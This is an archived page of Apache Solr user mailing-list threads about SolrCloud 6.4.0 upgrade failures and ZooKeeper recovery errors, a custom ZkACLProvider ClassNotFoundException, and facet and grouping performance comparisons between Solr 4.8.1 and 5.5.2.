>> On Thu, Feb 2, 2017 at 2:27 AM, Ravi Solr <ravis...@gmail.com> wrote:
>>
>> Hello,
>>>  Yesterday I upgraded from 6.0.1 to 6.4.0, and it's been a straight 12
>>> hours of debugging!! Can somebody kindly help me out of this misery?
>>>
>>> I have a set of 8 single-shard collections with 3 replicas. As soon as I
>>> updated the configs and started the servers, one of my collections got
>>> stuck with no leader. I have restarted Solr to no avail; I also tried to
>>> force a leader via the collections API, but that didn't work either. I
>>> also see that, from time to time, multiple Solr nodes go down all at the sam

Re: 6.4.0 collection leader election and recovery issues

2017-02-02 Thread Ravi Solr
When I try to roll back from 6.4.0 to my original version of 6.0.1, it now
throws another issue. Now I can't go to 6.4.0, nor can I roll back to 6.0.1.

Could not load codec 'Lucene62'.  Did you forget to add
lucene-backward-codecs.jar?
at org.apache.lucene.index.SegmentInfos.readCodec(SegmentInfos.java:429)
at
org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:349)
at
org.apache.lucene.index.SegmentInfos.readCommit(SegmentInfos.java:284)

Hope this doesn't cost me dearly. Any ideas, at least, on how to roll back
safely?

Thanks

Ravi Kiran Bhaskar

On Thu, Feb 2, 2017 at 4:52 AM, Ravi Solr <ravis...@gmail.com> wrote:

> Following up on my previous email, the intermittent server unavailability
> seems to be linked to the interaction between Solr and Zookeeper. Can
> somebody help me understand what this error means and how to recover from
> it.
>
> 2017-02-02 09:44:24.648 ERROR (recoveryExecutor-3-thread-16-
> processing-n:xx.xxx.xxx.xxx:1234_solr x:clicktrack_shard1_replica4
> s:shard1 c:clicktrack r:core_node3) [c:clicktrack s:shard1 r:core_node3
> x:clicktrack_shard1_replica4] o.a.s.c.RecoveryStrategy Error while trying
> to recover. core=clicktrack_shard1_replica4:org.apache.zookeeper.
> KeeperException$SessionExpiredException: KeeperErrorCode = Session
> expired for /overseer/queue/qn-
> at org.apache.zookeeper.KeeperException.create(
> KeeperException.java:127)
> at org.apache.zookeeper.KeeperException.create(
> KeeperException.java:51)
> at org.apache.zookeeper.ZooKeeper.create(ZooKeeper.java:783)
> at org.apache.solr.common.cloud.SolrZkClient$9.execute(
> SolrZkClient.java:391)
> at org.apache.solr.common.cloud.SolrZkClient$9.execute(
> SolrZkClient.java:388)
> at org.apache.solr.common.cloud.ZkCmdExecutor.retryOperation(
> ZkCmdExecutor.java:60)
> at org.apache.solr.common.cloud.SolrZkClient.create(
> SolrZkClient.java:388)
> at org.apache.solr.cloud.DistributedQueue.offer(
> DistributedQueue.java:244)
> at org.apache.solr.cloud.ZkController.publish(ZkController.java:1215)
> at org.apache.solr.cloud.ZkController.publish(ZkController.java:1128)
> at org.apache.solr.cloud.ZkController.publish(ZkController.java:1124)
> at org.apache.solr.cloud.RecoveryStrategy.doRecovery(
> RecoveryStrategy.java:334)
> at org.apache.solr.cloud.RecoveryStrategy.run(
> RecoveryStrategy.java:222)
> at com.codahale.metrics.InstrumentedExecutorService$
> InstrumentedRunnable.run(InstrumentedExecutorService.java:176)
> at java.util.concurrent.Executors$RunnableAdapter.
> call(Executors.java:511)
> at java.util.concurrent.FutureTask.run(FutureTask.java:266)
> at org.apache.solr.common.util.ExecutorUtil$
> MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:229)
> at java.util.concurrent.ThreadPoolExecutor.runWorker(
> ThreadPoolExecutor.java:1142)
> at java.util.concurrent.ThreadPoolExecutor$Worker.run(
> ThreadPoolExecutor.java:617)
> at java.lang.Thread.run(Thread.java:745)
>
> Thanks
>
> Ravi Kiran Bhaskar
>
> On Thu, Feb 2, 2017 at 2:27 AM, Ravi Solr <ravis...@gmail.com> wrote:
>
>> Hello,
>>  Yesterday I upgraded from 6.0.1 to 6.4.0, and it's been a straight 12
>> hours of debugging!! Can somebody kindly help me out of this misery?
>>
>> I have a set of 8 single-shard collections with 3 replicas. As soon as I
>> updated the configs and started the servers, one of my collections got stuck
>> with no leader. I have restarted Solr to no avail; I also tried to force a
>> leader via the collections API, but that didn't work either. I also see
>> that, from time to time, multiple Solr nodes go down all at the same time,
>> and only a restart resolves the issue.
>>
>> The error snippets are shown below
>>
>> 2017-02-02 01:43:42.785 ERROR (recoveryExecutor-3-thread-6-processing-n:
>> 10.128.159.245:9001_solr x:clicktrack_shard1_replica1 s:shard1
>> c:clicktrack r:core_node1) [c:clicktrack s:shard1 r:core_node1
>> x:clicktrack_shard1_replica1] o.a.s.c.RecoveryStrategy Error while trying
>> to recover. 
>> core=clicktrack_shard1_replica1:org.apache.solr.common.SolrException:
>> No registered leader was found after waiting for 4000ms , collection:
>> clicktrack slice: shard1
>>
>> solr.log.9:2017-02-02 01:43:41.336 INFO  (zkCallback-4-thread-29-proces
>> sing-n:10.128.159.245:9001_solr) [   ] o.a.s.c.c.ZkStateReader A cluster
>> state change: [WatchedEvent state:SyncConnected type:NodeDataChanged
>> path:/collections/clicktrack/state.json] for collection [clicktrack] has
>> occurred - updating... (live nodes size: [1])
>> solr.log.9:2017-02-02 01:43:42.224 INFO  (zkCallback-4-thread-29-proces

Re: 6.4.0 collection leader election and recovery issues

2017-02-02 Thread Ravi Solr
Following up on my previous email, the intermittent server unavailability
seems to be linked to the interaction between Solr and Zookeeper. Can
somebody help me understand what this error means and how to recover from
it.

2017-02-02 09:44:24.648 ERROR
(recoveryExecutor-3-thread-16-processing-n:xx.xxx.xxx.xxx:1234_solr
x:clicktrack_shard1_replica4 s:shard1 c:clicktrack r:core_node3)
[c:clicktrack s:shard1 r:core_node3 x:clicktrack_shard1_replica4]
o.a.s.c.RecoveryStrategy Error while trying to recover.
core=clicktrack_shard1_replica4:org.apache.zookeeper.KeeperException$SessionExpiredException:
KeeperErrorCode = Session expired for /overseer/queue/qn-
at org.apache.zookeeper.KeeperException.create(KeeperException.java:127)
at org.apache.zookeeper.KeeperException.create(KeeperException.java:51)
at org.apache.zookeeper.ZooKeeper.create(ZooKeeper.java:783)
at
org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkClient.java:391)
at
org.apache.solr.common.cloud.SolrZkClient$9.execute(SolrZkClient.java:388)
at
org.apache.solr.common.cloud.ZkCmdExecutor.retryOperation(ZkCmdExecutor.java:60)
at
org.apache.solr.common.cloud.SolrZkClient.create(SolrZkClient.java:388)
at
org.apache.solr.cloud.DistributedQueue.offer(DistributedQueue.java:244)
at org.apache.solr.cloud.ZkController.publish(ZkController.java:1215)
at org.apache.solr.cloud.ZkController.publish(ZkController.java:1128)
at org.apache.solr.cloud.ZkController.publish(ZkController.java:1124)
at
org.apache.solr.cloud.RecoveryStrategy.doRecovery(RecoveryStrategy.java:334)
at org.apache.solr.cloud.RecoveryStrategy.run(RecoveryStrategy.java:222)
at
com.codahale.metrics.InstrumentedExecutorService$InstrumentedRunnable.run(InstrumentedExecutorService.java:176)
at
java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at
org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:229)
at
java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at
java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)

Thanks

Ravi Kiran Bhaskar

On Thu, Feb 2, 2017 at 2:27 AM, Ravi Solr <ravis...@gmail.com> wrote:

> Hello,
>  Yesterday I upgraded from 6.0.1 to 6.4.0, and it's been a straight 12
> hours of debugging!! Can somebody kindly help me out of this misery?
>
> I have a set of 8 single-shard collections with 3 replicas. As soon as I
> updated the configs and started the servers, one of my collections got stuck
> with no leader. I have restarted Solr to no avail; I also tried to force a
> leader via the collections API, but that didn't work either. I also see
> that, from time to time, multiple Solr nodes go down all at the same time,
> and only a restart resolves the issue.
>
> The error snippets are shown below
>
> 2017-02-02 01:43:42.785 ERROR (recoveryExecutor-3-thread-6-processing-n:
> 10.128.159.245:9001_solr x:clicktrack_shard1_replica1 s:shard1
> c:clicktrack r:core_node1) [c:clicktrack s:shard1 r:core_node1
> x:clicktrack_shard1_replica1] o.a.s.c.RecoveryStrategy Error while trying
> to recover. 
> core=clicktrack_shard1_replica1:org.apache.solr.common.SolrException:
> No registered leader was found after waiting for 4000ms , collection:
> clicktrack slice: shard1
>
> solr.log.9:2017-02-02 01:43:41.336 INFO  (zkCallback-4-thread-29-
> processing-n:10.128.159.245:9001_solr) [   ] o.a.s.c.c.ZkStateReader A
> cluster state change: [WatchedEvent state:SyncConnected
> type:NodeDataChanged path:/collections/clicktrack/state.json] for
> collection [clicktrack] has occurred - updating... (live nodes size: [1])
> solr.log.9:2017-02-02 01:43:42.224 INFO  (zkCallback-4-thread-29-
> processing-n:10.128.159.245:9001_solr) [   ] o.a.s.c.c.ZkStateReader A
> cluster state change: [WatchedEvent state:SyncConnected
> type:NodeDataChanged path:/collections/clicktrack/state.json] for
> collection [clicktrack] has occurred - updating... (live nodes size: [1])
> solr.log.9:2017-02-02 01:43:43.767 INFO  (zkCallback-4-thread-23-
> processing-n:10.128.159.245:9001_solr) [   ] o.a.s.c.c.ZkStateReader A
> cluster state change: [WatchedEvent state:SyncConnected
> type:NodeDataChanged path:/collections/clicktrack/state.json] for
> collection [clicktrack] has occurred - updating... (live nodes size: [1])
>
>
> Suspecting the worst, I backed up the index, renamed the collection's
> data folder, and restarted the servers; this time the collection got a
> proper leader. So is my index really corrupted? The Solr UI showed live
> nodes just like the logs, but without any leader. Even with the leader
> issue somewhat alleviated after renaming the data folder and letting Solr
> create a ne

6.4.0 collection leader election and recovery issues

2017-02-01 Thread Ravi Solr
Hello,
 Yesterday I upgraded from 6.0.1 to 6.4.0, and it's been a straight 12
hours of debugging!! Can somebody kindly help me out of this misery?

I have a set of 8 single-shard collections with 3 replicas. As soon as I
updated the configs and started the servers, one of my collections got stuck
with no leader. I have restarted Solr to no avail; I also tried to force a
leader via the collections API, but that didn't work either. I also see that,
from time to time, multiple Solr nodes go down all at the same time, and only
a restart resolves the issue.

The error snippets are shown below

2017-02-02 01:43:42.785 ERROR
(recoveryExecutor-3-thread-6-processing-n:10.128.159.245:9001_solr
x:clicktrack_shard1_replica1 s:shard1 c:clicktrack r:core_node1)
[c:clicktrack s:shard1 r:core_node1 x:clicktrack_shard1_replica1]
o.a.s.c.RecoveryStrategy Error while trying to recover.
core=clicktrack_shard1_replica1:org.apache.solr.common.SolrException: No
registered leader was found after waiting for 4000ms , collection:
clicktrack slice: shard1

solr.log.9:2017-02-02 01:43:41.336 INFO
(zkCallback-4-thread-29-processing-n:10.128.159.245:9001_solr) [   ]
o.a.s.c.c.ZkStateReader A cluster state change: [WatchedEvent
state:SyncConnected type:NodeDataChanged
path:/collections/clicktrack/state.json] for collection [clicktrack] has
occurred - updating... (live nodes size: [1])
solr.log.9:2017-02-02 01:43:42.224 INFO
(zkCallback-4-thread-29-processing-n:10.128.159.245:9001_solr) [   ]
o.a.s.c.c.ZkStateReader A cluster state change: [WatchedEvent
state:SyncConnected type:NodeDataChanged
path:/collections/clicktrack/state.json] for collection [clicktrack] has
occurred - updating... (live nodes size: [1])
solr.log.9:2017-02-02 01:43:43.767 INFO
(zkCallback-4-thread-23-processing-n:10.128.159.245:9001_solr) [   ]
o.a.s.c.c.ZkStateReader A cluster state change: [WatchedEvent
state:SyncConnected type:NodeDataChanged
path:/collections/clicktrack/state.json] for collection [clicktrack] has
occurred - updating... (live nodes size: [1])


Suspecting the worst, I backed up the index, renamed the collection's data
folder, and restarted the servers; this time the collection got a proper
leader. So is my index really corrupted? The Solr UI showed live nodes just
like the logs, but without any leader. Even with the leader issue somewhat
alleviated after renaming the data folder and letting Solr create a new one,
my servers did go down a couple of times.

I am not all that well versed with ZooKeeper... any trick to make ZooKeeper
pick a leader and be happy? Did anybody have Solr/ZooKeeper issues with
6.4.0?

Thanks

Ravi Kiran Bhaskar


Re: ClassNotFoundException with Custom ZkACLProvider

2016-11-15 Thread Solr User
For those interested, I ended up bundling the customized ACL provider with
the solr.war.  I could not stomach looking at the stack trace in the logs.

On Mon, Nov 7, 2016 at 4:47 PM, Solr User <solr...@gmail.com> wrote:

> This is mostly just an FYI regarding future work on issues like SOLR-8792.
>
> I wanted admin update but world read on ZK since I do not have anything
> sensitive from a read perspective in the Solr data and did not want to
> force all SolrCloud clients to implement authentication just for read.  So,
> I extended DefaultZkACLProvider and implemented a replacement for
> VMParamsAllAndReadonlyDigestZkACLProvider.
>
> My custom code is loaded from the sharedLib in solr.xml.  However, there
> is a temporary ZK lookup to read solr.xml (and chroot) which is obviously
> done before loading sharedLib.  Therefore, I am faced with a
> ClassNotFoundException.  This has no negative effect on the ACL
> functionality... just the annoying stack trace in the logs.  I do not want
> to package this custom code with the Solr code and do not want to package
> this along with Solr dependencies in the Jetty lib/ext.
>
> So, I am planning to live with the stack trace and just wanted to share
> this for any future work on the dynamic solr.xml and chroot lookups or in
> case I am missing some work-around.
>
> Thanks!
>
>


ClassNotFoundException with Custom ZkACLProvider

2016-11-07 Thread Solr User
This is mostly just an FYI regarding future work on issues like SOLR-8792.

I wanted admin update but world read on ZK since I do not have anything
sensitive from a read perspective in the Solr data and did not want to
force all SolrCloud clients to implement authentication just for read.  So,
I extended DefaultZkACLProvider and implemented a replacement for
VMParamsAllAndReadonlyDigestZkACLProvider.
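A hedged sketch of what such a replacement can look like (the system-property
names follow the VMParams convention; treat this as an outline rather than
the exact class):

import java.security.NoSuchAlgorithmException;
import java.util.ArrayList;
import java.util.List;
import org.apache.solr.common.cloud.DefaultZkACLProvider;
import org.apache.zookeeper.ZooDefs;
import org.apache.zookeeper.data.ACL;
import org.apache.zookeeper.data.Id;
import org.apache.zookeeper.server.auth.DigestAuthenticationProvider;

public class AllAndWorldReadZkACLProvider extends DefaultZkACLProvider {
    @Override
    protected List<ACL> createGlobalACLsToAdd() {
        try {
            List<ACL> acls = new ArrayList<>();
            String user = System.getProperty("zkDigestUsername");
            String pass = System.getProperty("zkDigestPassword");
            if (user != null && pass != null) {
                Id admin = new Id("digest",
                        DigestAuthenticationProvider.generateDigest(user + ":" + pass));
                acls.add(new ACL(ZooDefs.Perms.ALL, admin)); // admin may do anything
            }
            acls.addAll(ZooDefs.Ids.READ_ACL_UNSAFE);        // the world may read
            return acls;
        } catch (NoSuchAlgorithmException e) {
            throw new RuntimeException(e);
        }
    }
}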

My custom code is loaded from the sharedLib in solr.xml.  However, there is
a temporary ZK lookup to read solr.xml (and chroot) which is obviously done
before loading sharedLib.  Therefore, I am faced with a
ClassNotFoundException.  This has no negative effect on the ACL
functionality... just the annoying stack trace in the logs.  I do not want
to package this custom code with the Solr code and do not want to package
this along with Solr dependencies in the Jetty lib/ext.

So, I am planning to live with the stack trace and just wanted to share
this for any future work on the dynamic solr.xml and chroot lookups or in
case I am missing some work-around.

Thanks!


Re: Faceting and Grouping Performance Degradation in Solr 5

2016-10-03 Thread Solr User
Below is some further testing.  This was done in an environment that had no
other queries or updates during testing.  We ran through several scenarios,
laid out in the table below.  The times are average times in milliseconds.
Same test methodology as above except there was a 5-minute warmup and a
15-minute test.

Note that both the segment and deletions were recorded from only 1 out of 2
of the shards so we cannot try to extrapolate a function between them and
the outcome.  In other words, just view them as "non-optimized" versus
"optimized" and "has deletions" versus "no deletions".  The only exceptions
are the 0 deletes were true for both shards and the 1 segment and 8 segment
cases were true for both shards.  A few of the tests were repeated as well.

The only conclusion that I could draw is that the number of segments and
the number of deletes appear to greatly influence the response times, at
least more than any difference in Solr version.  There also appears to be
some external contributor to variance... maybe network, etc.

Thoughts?


Date        Solr Version  Deleted Docs  Segments  facet.method=uif  Scenario #1  Scenario #2
9/29/2016   5.5.2         57873         34        YES               198          92
9/29/2016   5.5.2         57873         34        YES               210          88
9/29/2016   4.8.1         176958        18        N/A               145          59
9/30/2016   4.8.1         593694        27        N/A               186          62
9/30/2016   4.8.1         593694        27        N/A               190          58
9/30/2016   5.5.2         57873         34        YES               208          72
9/30/2016   5.5.2         57873         34        YES               209          70
9/30/2016   5.5.2         57873         34        NO                210          77
9/30/2016   5.5.2         57873         34        NO                206          74
9/30/2016   5.5.2         0             8         NO                109          68
9/30/2016   5.5.2         0             8         YES               142          73
9/30/2016   5.5.2         0             1         YES               73           63
9/30/2016   5.5.2         0             1         NO                70           61
10/3/2016   4.8.1         0             8         N/A               160          66
10/3/2016   4.8.1         0             8         N/A               109          54
10/3/2016   4.8.1         0             1         N/A               83           52
10/3/2016   4.8.1         0             1         N/A               85           51




On Wed, Sep 28, 2016 at 4:44 PM, Solr User <solr...@gmail.com> wrote:

> I plan to re-test this in a separate environment that I have more control
> over and will share the results when I can.
>
> On Wed, Sep 28, 2016 at 3:37 PM, Solr User <solr...@gmail.com> wrote:
>
>> Certainly.  And I would of course welcome anyone else to test this for
>> themselves especially with facet.method=uif to see if that has indeed
>> bridged the gap between Solr 4 and Solr 5.  I would be very happy if my
>> testing is invalid due to variance, problem in process, etc.  One thing I
>> was pondering is if I should force merge the index to a certain amount of
>> segments because indexing yields a random number of segments and
>> deletions.  The only thing stopping me short of doing that were
>> observations of longer Solr 4 times even with more deletions and similar
>> number of segments.
>>
>> We use Soasta as our testing tool.  Before testing, load is sent for
>> 10-15 minutes to make sure any Solr caches have stabilized.  Then the test
>> is run for 30 minutes of steady volume with Scenario #1 tested at 15
>> req/sec and Scenario #2 tested at 100 req/sec.  Each request is different
>> with input being pulled from data files.  The requests are repeatable test
>> to test.
>>
>> The numbers posted above are average response times as reported by
>> Soasta.  However, respective time differences are supported by Splunk which
>> indexes the Solr logs and Dynatrace which is instrumented on one of the
>> JVM's.
>>
>> The versions are deployed to the same machines thereby overlaying the
>> previous installation.  Going Solr 4 to Solr 5, full indexing is run with
>> the same input data.  Being in SolrCloud mode, the full indexing comprises
>> of indexing all documents and then deleting any that were not touched.
>> Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not
>> load with a Solr 5 index.  Testing Solr 4 after reverting yields the same
>> results as the previous Solr 4 test.
>>
>>
>> On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk>
>> wrote:
>>
>>> On Tue, 2016-09-27 at 15:08 -0500, Solr User wrote:
>>> > Further testing indicates that any performance difference is not due
>>> > to deletes.  Both Solr 4.8.1 and Solr 5.5.2 benefited from removing
>>> > deletes.
>>>
>>> Sanity check: Could you describe how you test?
>>>
>>> * How many queries do you issue for each test?
>>> * Are each query a new one or do you re-use the same query?
>>> * Do you discard the first X calls?
>>> * Are the numbers averages, medians or something third?
>>> * What do you do about disk cache?
>>> * Are both Solr's on the same machine?
>>> * Do they use the same index?
>>> * Do you alternate between testing 4.8.1 and 5.5.2 first?
>>>
>>> - Toke Eskildsen, State and University Library, Denmark
>>>
>>
>>
>


Re: Faceting and Grouping Performance Degradation in Solr 5

2016-09-28 Thread Solr User
I plan to re-test this in a separate environment that I have more control
over and will share the results when I can.

On Wed, Sep 28, 2016 at 3:37 PM, Solr User <solr...@gmail.com> wrote:

> Certainly.  And I would of course welcome anyone else to test this for
> themselves especially with facet.method=uif to see if that has indeed
> bridged the gap between Solr 4 and Solr 5.  I would be very happy if my
> testing is invalid due to variance, problem in process, etc.  One thing I
> was pondering is if I should force merge the index to a certain amount of
> segments because indexing yields a random number of segments and
> deletions.  The only thing stopping me short of doing that were
> observations of longer Solr 4 times even with more deletions and similar
> number of segments.
>
> We use Soasta as our testing tool.  Before testing, load is sent for 10-15
> minutes to make sure any Solr caches have stabilized.  Then the test is run
> for 30 minutes of steady volume with Scenario #1 tested at 15 req/sec and
> Scenario #2 tested at 100 req/sec.  Each request is different with input
> being pulled from data files.  The requests are repeatable test to test.
>
> The numbers posted above are average response times as reported by
> Soasta.  However, respective time differences are supported by Splunk which
> indexes the Solr logs and Dynatrace which is instrumented on one of the
> JVM's.
>
> The versions are deployed to the same machines thereby overlaying the
> previous installation.  Going Solr 4 to Solr 5, full indexing is run with
> the same input data.  Being in SolrCloud mode, the full indexing comprises
> of indexing all documents and then deleting any that were not touched.
> Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not
> load with a Solr 5 index.  Testing Solr 4 after reverting yields the same
> results as the previous Solr 4 test.
>
>
> On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk>
> wrote:
>
>> On Tue, 2016-09-27 at 15:08 -0500, Solr User wrote:
>> > Further testing indicates that any performance difference is not due
>> > to deletes.  Both Solr 4.8.1 and Solr 5.5.2 benefited from removing
>> > deletes.
>>
>> Sanity check: Could you describe how you test?
>>
>> * How many queries do you issue for each test?
>> * Are each query a new one or do you re-use the same query?
>> * Do you discard the first X calls?
>> * Are the numbers averages, medians or something third?
>> * What do you do about disk cache?
>> * Are both Solr's on the same machine?
>> * Do they use the same index?
>> * Do you alternate between testing 4.8.1 and 5.5.2 first?
>>
>> - Toke Eskildsen, State and University Library, Denmark
>>
>
>


Re: Faceting and Grouping Performance Degradation in Solr 5

2016-09-28 Thread Solr User
Certainly.  And I would of course welcome anyone else to test this for
themselves especially with facet.method=uif to see if that has indeed
bridged the gap between Solr 4 and Solr 5.  I would be very happy if my
testing is invalid due to variance, problem in process, etc.  One thing I
was pondering is if I should force merge the index to a certain amount of
segments because indexing yields a random number of segments and
deletions.  The only thing stopping me short of doing that were
observations of longer Solr 4 times even with more deletions and similar
number of segments.

We use Soasta as our testing tool.  Before testing, load is sent for 10-15
minutes to make sure any Solr caches have stabilized.  Then the test is run
for 30 minutes of steady volume with Scenario #1 tested at 15 req/sec and
Scenario #2 tested at 100 req/sec.  Each request is different with input
being pulled from data files.  The requests are repeatable test to test.

The numbers posted above are average response times as reported by Soasta.
However, respective time differences are supported by Splunk which indexes
the Solr logs and Dynatrace which is instrumented on one of the JVM's.

The versions are deployed to the same machines thereby overlaying the
previous installation.  Going Solr 4 to Solr 5, full indexing is run with
the same input data.  Being in SolrCloud mode, the full indexing comprises
of indexing all documents and then deleting any that were not touched.
Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not
load with a Solr 5 index.  Testing Solr 4 after reverting yields the same
results as the previous Solr 4 test.


On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk>
wrote:

> On Tue, 2016-09-27 at 15:08 -0500, Solr User wrote:
> > Further testing indicates that any performance difference is not due
> > to deletes.  Both Solr 4.8.1 and Solr 5.5.2 benefited from removing
> > deletes.
>
> Sanity check: Could you describe how you test?
>
> * How many queries do you issue for each test?
> * Are each query a new one or do you re-use the same query?
> * Do you discard the first X calls?
> * Are the numbers averages, medians or something third?
> * What do you do about disk cache?
> * Are both Solr's on the same machine?
> * Do they use the same index?
> * Do you alternate between testing 4.8.1 and 5.5.2 first?
>
> - Toke Eskildsen, State and University Library, Denmark
>


Re: Faceting and Grouping Performance Degradation in Solr 5

2016-09-27 Thread Solr User
Further testing indicates that any performance difference is not due to
deletes.  Both Solr 4.8.1 and Solr 5.5.2 benefited from removing deletes.
The times appear to converge on an optimized index.  Below are the
details.  Not sure what else to make of this at this point other than
moving forward with an upgrade with an optimized index wherever possible.

Scenario #1:  Using facet.method=uif with faceting on several multi-valued
fields.
4.8.1 (with deletes): 115 ms
5.5.2 (with deletes): 155 ms
4.8.1 (without deletes): 104 ms
5.5.2 (without deletes): 125 ms
4.8.1 (1 segment without deletes): 55 ms
5.5.2 (1 segment without deletes): 44 ms

Scenario #2:  Using facet.method=enum with faceting on several multi-valued
fields.  These fields are different than Scenario #1 and perform much
better with enum hence that method is used instead.
4.8.1 (with deletes): 38 ms
5.5.2 (with deletes): 49 ms
4.8.1 (without deletes): 35 ms
5.5.2 (without deletes): 42 ms
4.8.1 (1 segment without deletes): 28 ms
5.5.2 (1 segment without deletes): 34 ms

On Tue, Sep 27, 2016 at 3:45 AM, Alessandro Benedetti <abenede...@apache.org
> wrote:

> Hi !
> At the time we didn't investigate the deletion implication at all.
> This can be interesting.
> if you proceed with your investigations and discover what changed in the
> deletion approach, I would be more than happy to help!
>
> Cheers
>
> On Mon, Sep 26, 2016 at 10:59 PM, Solr User <solr...@gmail.com> wrote:
>
> > Thanks again for your work on honoring the facet.method.  I have an
> > observation that I would like to share and get your feedback on if
> > possible.
> >
> > I performance tested Solr 5.5.2 with various facet queries and the only
> way
> > I get comparable results to Solr 4.8.1 is when I expungeDeletes.  Is it
> > possible that Solr 5 is not as efficiently ignoring deletes as Solr 4?
> > Here are the details.
> >
> > Scenario #1:  Using facet.method=uif with faceting on several
> multi-valued
> > fields.
> > 4.8.1 (with deletes): 115 ms
> > 5.5.2 (with deletes): 155 ms
> > 5.5.2 (without deletes): 125 ms
> > 5.5.2 (1 segment without deletes): 44 ms
> >
> > Scenario #2:  Using facet.method=enum with faceting on several
> multi-valued
> > fields.  These fields are different than Scenario #1 and perform much
> > better with enum hence that method is used instead.
> > 4.8.1 (with deletes): 38 ms
> > 5.5.2 (with deletes): 49 ms
> > 5.5.2 (without deletes): 42 ms
> > 5.5.2 (1 segment without deletes): 34 ms
> >
> >
> >
> > On Tue, May 31, 2016 at 11:57 AM, Alessandro Benedetti <
> > abenede...@apache.org> wrote:
> >
> > > Interesting developments :
> > >
> > > https://issues.apache.org/jira/browse/SOLR-9176
> > >
> > > I think we found why term Enum seems slower in recent Solr !
> > > In our case it is likely to be related to the commit I mention in the
> > Jira.
> > > Have a check Joel !
> > >
> > > On Wed, May 25, 2016 at 12:30 PM, Alessandro Benedetti <
> > > abenede...@apache.org> wrote:
> > >
> > > > I am investigating this scenario right now.
> > > > I can confirm that the enum slowness is in Solr 6.0 as well.
> > > > And I agree with Joel, it seems to be un-related with the famous
> > faceting
> > > > regression :(
> > > >
> > > > Furthermore with the legacy facet approach, if you set docValues for
> > the
> > > > field you are not going to be able to try the enum approach anymore.
> > > >
> > > > org/apache/solr/request/SimpleFacets.java:448
> > > >
> > > > if (method == FacetMethod.ENUM && sf.hasDocValues()) {
> > > >   // only fc can handle docvalues types
> > > >   method = FacetMethod.FC;
> > > > }
> > > >
> > > >
> > > > I got really horrible regressions simply using term enum in both
> Solr 4
> > > > and Solr 6.
> > > >
> > > > And even the most optimized fcs approach with docValues and
> > > > facet.threads=nCore does not perform as the simple enum in Solr 4 .
> > > >
> > > > i.e.
> > > >
> > > > For some sample queries I have 40 ms vs 160 ms and similar...
> > > > I think we should open an issue if we can confirm it is not related
> > with
> > > > the other.
> > > > A lot of people will continue using the legacy approach for a
> while...
> > > >
> > > > On Wed, May 18, 2016 at 10:42 PM, Joel Bernstein <joels...@gmail.com
> >

Re: Faceting and Grouping Performance Degradation in Solr 5

2016-09-26 Thread Solr User
Thanks again for your work on honoring the facet.method.  I have an
observation that I would like to share and get your feedback on if possible.

I performance tested Solr 5.5.2 with various facet queries and the only way
I get comparable results to Solr 4.8.1 is when I expungeDeletes.  Is it
possible that Solr 5 is not as efficiently ignoring deletes as Solr 4?
Here are the details.

Scenario #1:  Using facet.method=uif with faceting on several multi-valued
fields.
4.8.1 (with deletes): 115 ms
5.5.2 (with deletes): 155 ms
5.5.2 (without deletes): 125 ms
5.5.2 (1 segment without deletes): 44 ms

Scenario #2:  Using facet.method=enum with faceting on several multi-valued
fields.  These fields are different than Scenario #1 and perform much
better with enum hence that method is used instead.
4.8.1 (with deletes): 38 ms
5.5.2 (with deletes): 49 ms
5.5.2 (without deletes): 42 ms
5.5.2 (1 segment without deletes): 34 ms



On Tue, May 31, 2016 at 11:57 AM, Alessandro Benedetti <
abenede...@apache.org> wrote:

> Interesting developments :
>
> https://issues.apache.org/jira/browse/SOLR-9176
>
> I think we found why term Enum seems slower in recent Solr !
> In our case it is likely to be related to the commit I mention in the Jira.
> Have a check Joel !
>
> On Wed, May 25, 2016 at 12:30 PM, Alessandro Benedetti <
> abenede...@apache.org> wrote:
>
> > I am investigating this scenario right now.
> > I can confirm that the enum slowness is in Solr 6.0 as well.
> > And I agree with Joel, it seems to be un-related with the famous faceting
> > regression :(
> >
> > Furthermore with the legacy facet approach, if you set docValues for the
> > field you are not going to be able to try the enum approach anymore.
> >
> > org/apache/solr/request/SimpleFacets.java:448
> >
> > if (method == FacetMethod.ENUM && sf.hasDocValues()) {
> >   // only fc can handle docvalues types
> >   method = FacetMethod.FC;
> > }
> >
> >
> > I got really horrible regressions simply using term enum in both Solr 4
> > and Solr 6.
> >
> > And even the most optimized fcs approach with docValues and
> > facet.threads=nCore does not perform as the simple enum in Solr 4 .
> >
> > i.e.
> >
> > For some sample queries I have 40 ms vs 160 ms and similar...
> > I think we should open an issue if we can confirm it is not related with
> > the other.
> > A lot of people will continue using the legacy approach for a while...
> >
> > On Wed, May 18, 2016 at 10:42 PM, Joel Bernstein <joels...@gmail.com>
> > wrote:
> >
> >> The enum slowness is interesting. It would appear on the surface to not
> be
> >> related to the FieldCache issue. I don't think the main emphasis of the
> >> JSON facet API has been the enum approach. You may find using the JSON
> >> facet API and eliminating the use of enum meets your performance needs.
> >>
> >> With the CollapsingQParserPlugin top_fc is definitely faster during
> >> queries. The tradeoff is slower warming times and increased memory usage
> >> if
> >> the collapse fields are used in faceting, as faceting will load the
> field
> >> into a different cache.
> >>
> >> Joel Bernstein
> >> http://joelsolr.blogspot.com/
> >>
> >> On Wed, May 18, 2016 at 5:28 PM, Solr User <solr...@gmail.com> wrote:
> >>
> >> > Joel,
> >> >
> >> > Thank you for taking the time to respond to my question.  I tried the
> >> JSON
> >> > Facet API for one query that uses facet.method=enum (since this one
> has
> >> a
> >> > ton of unique values and performed better with enum) but this was way
> >> > slower than even the slower Solr 5 times.  I did not try the new API
> >> with
> >> > the non-enum queries though so I will give that a go.  It looks like
> >> Solr
> >> > 5.5.1 also has a facet.method=uif which will be interesting to try.
> >> >
